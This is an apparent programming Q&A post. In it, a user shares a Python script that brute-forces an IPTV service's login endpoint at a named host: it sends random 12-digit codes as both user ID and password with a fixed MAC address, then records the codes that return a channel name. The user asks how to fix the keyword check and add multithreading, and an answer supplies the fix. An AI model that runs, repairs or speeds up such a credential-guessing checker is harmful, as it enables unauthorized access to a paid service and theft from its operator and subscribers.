# How to find keyword using link in Python?

Tags: python

i'm not good at python . I have trouble by make a checker . I want to find a keyword but have error . Can anyone help me ?

edit : can anyone help me to add multithreading in this script ?

```
import random, string, requests
f=open("Valid Code.txt", "w", encoding='utf-8')
 
while True:
    code = ('').join(random.choices(string.digits, k=12))
    r = requests.get(f"http://itv.ilovetv.tw:9888/auth_box.jsp?uid={code}&pass={code}&mac=a877a9525da0a413")
    word = 'NHK総合'
    if r.find.word
        print(f"HITS -> {code}")
        f.write(f"/{code}\n")
    else:
        print(f"ERROR -> {code}")
```

Comment: Which keyword you have to find

Answer (score 2):

Instead of:

```
    if r.find.word
```

Do this:

```
    if word in r.text:
```